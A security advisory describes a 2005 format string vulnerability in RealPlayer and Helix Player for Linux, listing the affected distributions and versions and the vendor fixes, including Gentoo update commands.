2005-09-26 12:00:00 2009-07-12 05:06:00
iDEFENSE Labs discovered this vulnerability.

- Affected program versions

S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Desktop 4.0
Red Hat Fedora Core4
Red Hat Fedora Core3
Red Hat Enterprise Linux AS 4
Real Networks RealPlayer For Unix 10.0.4
+ Red Hat Enterprise Linux AS 4
+ RedHat Enterprise Linux ES 4
+ RedHat Enterprise Linux WS 4
+ S.u.S.E. Linux Personal 9.3
+ S.u.S.E. Linux Personal 9.2
Real Networks RealPlayer For Unix 10.0.3
+ S.u.S.E. Linux Personal 9.3
+ S.u.S.E. Linux Personal 9.2
Real Networks RealPlayer 10 for Linux
Real Networks RealPlayer 10 Japanese
Real Networks RealPlayer 10 German
Real Networks RealPlayer 10 English
Real Networks Helix Player for Linux 1.0.5
+ Gentoo Linux
Real Networks Helix Player for Linux 1.0.4
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Red Hat Enterprise Linux AS 4
+ Red Hat Fedora Core3
+ RedHat Desktop 4.0
+ RedHat Enterprise Linux ES 4
+ RedHat Enterprise Linux WS 4
Real Networks Helix Player for Linux 1.0.3
+ Gentoo Linux
+ Red Hat Fedora Core3
Real Networks Helix Player for Linux 1.0.2
+ Red Hat Enterprise Linux AS 4
+ RedHat Enterprise Linux ES 4
+ RedHat Enterprise Linux WS 4
Real Networks Helix Player for Linux 1.0.1
Real Networks Helix Player for Linux 1.0

- Vulnerability discussion

RealPlayer and Helix player are susceptible to a format string vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input, allowing a remote attacker to supply format specifiers directly to a formatted printing function.

Successful exploitation of this vulnerability allows remote attackers to execute arbitrary machine code in the context of the affected application.

RealPlayer 10.0 through 10.0.5 for Linux and Helix Player 1.0 through 1.0.5 are prone to this issue.

- Exploit

An exploit was provided by c0ntex <c0ntexb@gmail.com>:

- Solution

RedHat has released advisories RHSA-2005:788-3, FEDORA-2005-940, and FEDORA-2005-941 to address this issue in RedHat Enterprise Linux, and Fedora Core 3 and 4 respectively. Please see the referenced advisories for further information.

Debian has released advisory DSA 826-1 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Gentoo has released advisory GLSA 200510-07 to address this issue.

Gentoo users may obtain RealPlayer updates by running the following commands as the superuser:

emerge --sync
emerge --ask --oneshot --verbose ">=media-video/realplayer-10.0.6"

Gentoo users may obtain Helix Player updates by running the following commands as the superuser:

emerge --sync
emerge --ask --oneshot --verbose ">=media-video/helixplayer-1.0.6"

SUSE has released advisory SUSE-SA:2005:059 to address this issue in affected products. Please see the referenced advisory for more information.

RealNetworks has released fixes for this issue:


Real Networks RealPlayer 10 for Linux

Real Networks Helix Player for Linux 1.0

Real Networks Helix Player for Linux 1.0.1

Real Networks Helix Player for Linux 1.0.2

Real Networks Helix Player for Linux 1.0.3

Real Networks Helix Player for Linux 1.0.4

Real Networks Helix Player for Linux 1.0.5

- References

 

 
